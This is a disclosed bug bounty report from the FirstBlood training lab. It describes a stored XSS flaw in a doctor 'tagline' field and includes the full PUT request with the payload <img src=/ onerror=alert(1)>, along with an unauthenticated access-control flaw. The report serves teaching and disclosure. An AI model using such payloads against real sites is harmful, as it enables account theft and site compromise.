FirstBlood-#1785 — Stored XSS with tagline
This issue was discovered on FirstBlood v3
On 2022-12-16, pichik Level 4 reported:
Getting started
Learn about vulnerability types 
Getting started in bug bounties 
Test your knowledge
Free Web Application Challenges
Guides for your hunts 
ZSeano's Methodology
Effective Note Taking for bug bounties
Useful Resources 
Disclosed HackerOne Reports 
Our community
Endorsed Members
Hackevents 
Member Articles
Hi,
I dont know why it took me so long to find where is tagline used, but here it is.
DESCRIPTION:
With new /api/managedoctors.php endpoint reported before, will be new param tagline revealed to us.
This parameter is vulnerable to stored XSS at /meet_drs.php endpoint.
There is no filtering or encoding in place so payload is simple as <img src=/ onerror=alert(1)>.
Here is the PUT request:
PUT /api/managedoctors.php HTTP/1.1
Host: 8cb7021a2c6a-pichik.a.firstbloodhackers.com
X-Site-Req: permitted
Content-Length: 89
Content-Type:application/xml
{
"name":"test",
"bio":"test",
"tagline":"<img src=/ onerror=alert(1)>",
"drId":"1"
}
POC URL:
This is the endpoint where XSS is triggered:
https://8cb7021a2c6a-pichik.a.firstbloodhackers.com/meet_drs.php
POC SCREEN:
IMPACT:
This can be combined with other bugs, to steal accounts, etc..
REMEDIATION:
Use html encoding for all user input.
Remove public access to /api/managedoctors.php.
P2 High
Endpoint: /api/managedoctors.php
Parameter: tagline
Payload: <img src=/ onerror=alert(1)>
FirstBlood ID: 75
Vulnerability Type: Access_control
An unauthenticated user can modify doctors via a PUT request on the /api/managedoctors.php endpoint
FirstBlood ID: 70
Vulnerability Type: Stored XSS
Doctors can have taglines set however the tagline is vulnerable to stored XSS on meet_drs.php